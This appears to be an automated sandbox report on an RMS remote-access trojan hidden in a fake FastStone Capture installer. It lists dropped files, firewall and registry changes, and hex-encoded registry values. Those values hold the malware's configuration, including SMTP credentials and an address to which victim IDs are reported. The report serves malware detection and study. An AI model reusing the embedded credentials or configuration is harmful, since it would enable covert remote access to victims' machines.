Malware Analysis Report

2024-11-15 08:39

Sample ID 220427-v7g2lsbbgj
Target 0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94
SHA256 0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94
Tags
rms discovery evasion rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94

Threat Level: Known bad

The file 0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94 was found to be: Known bad.

Malicious Activity Summary

rms discovery evasion rat trojan

RMS

Drops file in Drivers directory

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Checks installed software on the system

Drops file in System32 directory

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Runs ping.exe

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-27 17:37

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-04-27 17:37

Reported

2022-04-27 19:29

Platform

win10v2004-20220414-en

Max time kernel

185s

Max time network

192s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"

Signatures

RMS

trojan rat rms

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\libeay32.dll C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Windows\SysWOW64\attrib.exe N/A

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\attrib.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\FastStone Capture\FSCapture.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCaptureHelp.chm C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSFocus.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCapture.LANG C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSRecorder.LANG C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCrossHair.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSLogo.png C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSRecorder.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = [value omitted] C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = [value omitted] C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5452306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = [value omitted] C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = [value omitted] C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = [value omitted] C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = [value omitted] C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = [value omitted] C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = [value omitted] C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = [value omitted] C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = [value omitted] C:\Windows\SysWOW64\drivers\install.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2756 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2756 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 2756 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 2756 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 4916 wrote to memory of 4220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 4220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 4220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4120 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4120 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4120 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4120 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4120 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4120 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 2292 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 2292 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 4120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2756 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
